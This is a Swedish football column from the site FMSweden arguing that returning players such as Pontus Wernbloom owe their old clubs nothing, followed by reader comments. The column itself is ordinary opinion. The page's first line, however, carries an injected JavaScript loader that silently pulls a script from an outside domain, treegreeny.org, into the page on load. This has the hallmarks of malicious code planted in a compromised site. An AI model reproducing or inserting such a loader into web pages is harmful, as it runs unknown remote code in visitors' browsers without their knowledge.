;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); AW med Tobbe – Hemvändare – FMSweden
Meny Stäng

AW med Tobbe – Hemvändare

Vår käre kompanjon här på FMS, Pontus Wernbloom, är klar för IFK Göteborg. Han återvänder efter att ha gjort sin senaste match för Blåvitt 2009. Cirkeln är väl därmed sluten och alla som håller på IFK Göteborg får äntligen som dom vill..eller??

Faktum är att jag den här veckan skulle vilja lyfta en sak, som jag har irriterat mig på under en väldigt lång tid. Med risk för att återigen trampa folk på tårna, så ska jag försöka förklara. 

 

Pontus Wernbloom är den senaste i raden “hemvändare” som väljer att, vad jag antar, avsluta karriären där den fick fart på riktigt. Genom åren har vi sett ett antal spelare välja att komma tillbaka till klubbar där man slagit igenom. Markus Rosenberg är den spelaren, som kanske tillsammans med Anders Svensson, gjort absolut mest för sin respektive förening på planen. Vad dessa spelarna betyder på ett lite större plan är väldigt svårt att mäta.

Jag kan ju se vad som har hänt med Malmö FF sen Rosenberg kom hem och det är klart att hans inverkan på klubben, har betytt mer än bara vinster på planen, även om det är där det börjar nånstans.

Det finns dock enligt mig, en väldigt konstig inställning till s.k hemvändare. Inte så mycket när dom väl är hemma, men när dom fortfarande är ute i världen och spelar. Låt mig utveckla.

Jag väljer att använda Blåvitt som exempel nu, eftersom jag har mer koll på situationen där än på andra ställen. Jag tror dock att inställningen är liknande i de flesta klubbar.

Jag ska försöka ställa ett par påståenden mot varandra och sen förklara varför jag har svårt med inställningen som många supportrar har. Jag säger inte att jag har rätt, men såhär tycker jag.

”Ni har en skyldighet att komma hem och betala tillbaka till klubben som gav er chansen”

Förlåt, men nej det har man inte. Att klubben som väljer att lyfta upp en bra junior gör det, beror på att spelaren i fråga är bra och att klubben har nytta av det. Man lyfter inte upp en junior för att vara snäll, på så sätt har klubben gjort det som är bäst för den själv.

Man kan däremot själv känna att man VILL komma hem till klubben som gjorde mycket för en, när man var ung och därför VÄLJER man att ta klivet hem igen, när “karriären” utomlands är klar.

Och man gör det när man är klar, inte innan. Varför skulle en spelare som fortfarande håller för spel i bättre ligor, åka hem bara för att klubben hemma vill det? Det borde i så fall vara lika givet att klubben, ska ta emot alla spelare som vill komma hem igen, för att det är deras skyldighet att hjälpa sina f.d spelare att få avsluta “hemma”. Nej, det går ju inte, så påstå inte att tvärtom är solklart.

”Du som har så mycket pengar kan komma hem och spela gratis nu”

Återigen nej, varför då?

Att vara fotbollsspelare är ett jobb, låt vara ett jävligt speciellt och underbart jobb, men likväl är det det som ger dig en inkomst. Tror ni Elon Musk jobbar gratis på Tesla nu, bara för att han har massa pengar?

Det blir en skev bild och skapar en massa onödiga diskussioner om pengar och dylikt. Hade pengarna varit det viktigaste för en spelare, hade en flytt till Allsvenskan inte varit aktuellt överhuvudtaget, så räkna med att spelarna mer eller mindre spelar “gratis” mot vad dom hade kunnat få.

Återigen, man kan välja att spela mer eller mindre gratis, för att hjälpa klubben och dessutom ge utrymme för att använda eventuella “extrapengar” som blir över till andra utgifter, men då ska spelaren göra det valet. Det är ingen skyldighet att göra det.

Sluta snacka en massa om att du vill komma hem, när du ändå inte gör det. Min klubb är ingen plats för att bara varva ner. Kom hem eller håll käften

Nja, om vi tittar lite mer på just den här diskussionen, så tycker jag såhär och nu utgår jag från Blåvitt. Jag vill att f.d spelare ska komma och träna på Kamratgården när dom är hemma. Jag vill att spelarna ska känna att här är jag alltid välkommen, här har jag en plats jag vill komma till och få min träning, när jag har semester. Givetvis kommer media om dom är på plats ställa frågan om en eventuell återkomst.

Jag tror inte att supportrar vill ha svar i stil med: Inga kommentarer

Är det inte bättre att säga som det är?

Jag spelar gärna i Blåvitt igen, om tidpunkten är rätt

Om jag kommer hem till Sverige, är det bara Blåvitt som gäller. 

Sådana svar ska inte tolkas som, jag kommer hem när jag är 32 och är mitt uppe i karriären.

Att spelare kommer hem när dom är “klara” utomlands, innebär inte att dom kommer hem och skiter i allt och bara dricker bärs och har det gott. Då skulle dom inte komma hem och spela. För precis som många säger, dom har så dom klarar sig, dom behöver inte pengarna. Kommer en spelare hem, är det för att han vill spela för klubben och då kommer han känna att han vill vara bra.

Oscar Wendt är 35 år och spelar i Bundesliga, i ett topplag dessutom. Jag läste nånstans att om han kommer hem när han är 36 år, kommer han vara tillräckligt bra då? Han är ju gammal.

Snälla, spelar han i Bundesliga och Champions League vid 35, löser han nog Allsvenskan ett år senare.

Sen är inte alla hemvändare bra, det är absolut inte det jag menar. Men det beror inte på att dom har kommit hem för att skita i allt.

Att alla lags supportrar vill ha hem sina gamla spelare som gjort så mycket bra och bidragit med så mycket minnen är givetvis fullt logiskt. Jag som är supporter numera hade älskat att få se alla spelare komma hem och lyfta klubben. Jag tycker det är bra att spelare som Ola Toivonen och Pontus Wernbloom väljer att avsluta i Allsvenskan. Jag tycker det ger en enorm kick till hela fotbollen i Sverige.

Pontus Wernbloom kommer hem och spelar i Allsvenskan och IFK Göteborg, för att han vill det. För att han tycker det ska bli jävligt gött och sjukt roligt.

Inte för att A eller B på Twitter har taggat honom i X antal inlägg och gjort det klart att det är hans skyldighet. Detsamma kommer gälla alla andra spelare, som i framtiden skulle kunna tänkas bli hemvändare. Så låt alla köra sina race, så kommer de hem, när de är klara. Skulle de inte göra det, ja då kommer nån annan, lite längre fram, när han är klar.

Trevlig helg och tack för mig.

 

Please wait...

Liknande Inlägg

15 kommentarer

 1. Rickard

  Håller med dig. Som spelare lär man ju knappast bli mer taggad på att komma hem när vissa supportrar spyr ut sig oförtjänt skit på twitter. Jag har full respekt för alla fd spelare som är proffs så länge dom inte går till en konkurrent i sverige, som exempelvis Jesper Judas Blomqvist gjorde. Kom gärna tillbaka när du känner för det eller avsluta karriären utomlands, men kom inte hem och avsluta karriären hos en konkurrent.

 2. TeamAdam

  Skulle säga att Blåvitt tar en stor risk med dessa hemvändare. Wernblooms kvalité i all ära men att inte ha lirat tävlingsmatch på så länge i den åldern innebär alltid en risk.

  Blåvitt har lidit av större ekonomiska problem nu de senaste åren vilket knappast blir bättre under corona. Är det verkligen så klokt då att lägga förmodat höga löneposter då på spelare som Wernbloom och dylika hemvändare? Det är ingen spelare man kommer kunna sälja vidare liksom.

  Överlag har jag även svårt för hemvändare då det är ett ofta återkommande tjat i supporterkretsar. Långt ifrån alltid blir det succé men folk tenderar att drömma tillbaka på forna nyckelspelare i truppen och förvänta sig samma resultat från spelaren när han återvänder. Bakåtsträvande att inte vilja leta efter nya namn att göra karriär i klubben. Detta inte menat just mot Wernbloom utan hemvändare överlag.

  • Tobias Hysén

   Jag förstår precis vad du menar, men jag tror inte att dessa spelare kommer belasta ekonomin så som du tror.
   Blåvitt just har ju en extern del som hjälper till med den här typen av värvningar.
   Dessutom handlar detta året om att rädda kontraktet, det finns inget utrymme att tänka längre än så just nu. Ekonomin kommer förstöras fullständigt om man skulle åka ur allsvenskan.
   Annars håller jag med om drömmandet om hemvändare, men det är väl Markus Rosenbergs fel. Hans inverkan på MFF är väl det alla ser framför sig att just sin egen hemvändare ska göra.

 3. Nilisse

  Helt rätt. Bra skrivet. Det är en väldigt vanlig “sjukdom” som jag märkt inom Blåvitt-kretsar. Både Berg och Wendt nu får ju en oförtjänt känga bara för de inte kommer hem och spelar som välgörenhet. De “gav tillbaka” redan när de lira här och såldes, klubben fick ju pengar.

  Det är alltid kul när klasspelare kommer hem, även när de kommer och bara tränar. Det är grädde på moset när de kommer hem så som Pontus gör, eller som du gjort eller Seb(som jag tycker klubben och supportrar borde ge tillbaka till inte tvärt om för trogen tjänst).

  Människor är as, supportrar är as. Det kommer med att bry sig om klubben till den grad att allt vett försvinner och de anser att en spelare från klubben ska känna samma sak. För supportrar så spelare känna att det är ett privilegium att spela för klubben, inte ett jobb. Därför ställs orimliga krav och det blir orimligt hat.

Lämna ett svar